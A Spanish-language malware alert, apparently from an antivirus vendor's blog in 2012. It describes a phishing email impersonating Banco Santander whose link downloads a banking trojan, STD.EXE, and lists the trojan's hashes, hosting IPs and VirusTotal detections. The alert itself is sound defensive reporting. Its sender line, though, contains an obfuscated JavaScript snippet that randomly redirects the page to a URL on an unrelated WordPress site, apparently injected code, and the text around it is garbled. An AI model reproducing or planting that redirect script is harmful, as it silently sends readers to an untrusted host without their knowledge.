Nuevo mail malicioso que aparenta venir del BANCO DE SANTANDER

Avisamos que se está propagando un nuevo mail malicioso con estas caracteristicas:

________________

Asunto:  nuevo sistema de seguridad banco santander.
Fecha:  Tue, 05 Jun 2012 04:26:56 -0300
De:  santander<$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:sat@satinfo.es”>sat@satinfo.es
to de información entre el Banco y sus clientes. Por este motivo, Banco Santander cuenta con las máximas medidas de seguridad para garantizar la confidencialidad de las comunicaciones entre el Banco y el cliente. No obstante, estas medidas pueden cambiar sin notificación, con el fin de proteger sus datos personales. Este correo le ha sido enviado automáticamente por nuestro sistema, como notificación de los cambios efectuados en el sistema. Para seguir utilizando los servicios de Banca por Internet de Santander, debe instalar lo nuevo sistema de seguridad para efectuar sus operaciones.

Acceda a el enlace que hemos puesto a su disposición pulsando [AQUÍ].
NOTA: Recuerde que no podrás operar en Banco Santander sin Instalar lo Sistema, es muy importante su utilización. Si la instalación no es realizado dentro de 48 Horas su cuenta sera suspendida temporalmente hasta que su registro sea completado.

Todos los Derechos Reservados 2012© BancoSantander.

_________________

COMO SIEMPRE; NO PULSAR EN ENLACES NI IMAGENES NI FICHEROS que llegan en correos no solicitados, y menos reportar datos a los cuestionarios que ellos o sus derivados pidan

El enlace existente en el mail lleva realmente a  209.1.104.82 US United States CA California Sunnyvale  37.3688 -122.0363 SAVVIS Communications Corporation SIMCO Electronics

y descarga un fichero STD.EXE desde un servidor de MALTA :

195.158.103.81 MT Malta     35.8333 14.5833 GO p.l.c. GO p.l.c.
El preanalisis de virustotal de dicho fichero ofrece el siguiente inform:

SHA256: cfb7afdce129e6ea7391cafdf0253b7dcc972dbabf550c5a32d512751ddeca4a
SHA1: 8c112dd0fb1d814999a614b57891f2db2121d8bf
MD5: b4f4d632282fc94450e1baedc059082e
Tamaño: 950.0 KB ( 972800 bytes )
Nombre: STD.exe
Tipo: Win32 EXE
Etiquetas: bobsoft
Detecciones: 9 / 42
Fecha de análisis: 2012-06-07 09:11:28 UTC ( hace 2 minutos )

01Más detallesAntivirus Resultado Actualización
AhnLab-V3 Trojan/Win32.Banker 20120606
AntiVir – 20120607
Antiy-AVL – 20120607
Avast – 20120607
AVG – 20120607
BitDefender Gen:Variant.Zusy.1195 20120607
ByteHero – 20120606
CAT-QuickHeal – 20120607
ClamAV PUA.Win32.Packer.BorlandDelphi-9 20120606
Commtouch – 20120607
Comodo – 20120607
DrWeb – 20120607
Emsisoft Trojan-Banker.Win32.Banker!IK 20120607
eSafe – 20120605
F-Prot – 20120606
F-Secure Gen:Variant.Zusy.1195 20120607
Fortinet – 20120607
GData Gen:Variant.Zusy.1195 20120607
Ikarus Trojan-Banker.Win32.Banker 20120607
Jiangmin Trojan/Banker.Banker.nlr 20120607
K7AntiVirus – 20120606
Kaspersky – 20120607
McAfee – 20120607
McAfee-GW-Edition – 20120606
Microsoft – 20120607
NOD32 probably a variant of Win32/Spy.Banker.WUN 20120607
Norman – 20120605
nProtect – 20120607
Panda – 20120606
PCTools – 20120607
Rising – 20120606
Sophos – 20120607
SUPERAntiSpyware – 20120607
Symantec – 20120607
TheHacker – 20120607
TotalDefense – 20120606
TrendMicro – 20120607
TrendMicro-HouseCall – 20120607
VBA32 – 20120606
VIPRE – 20120607
ViRobot – 20120607
VirusBuster – 20120605
A partir del ELISTARA 25.64 de hoy, que estará disponible en nuestra web a partir de las 19 h, se detectará y eliminará dicho malware.
saludos

ms, 7-6-2012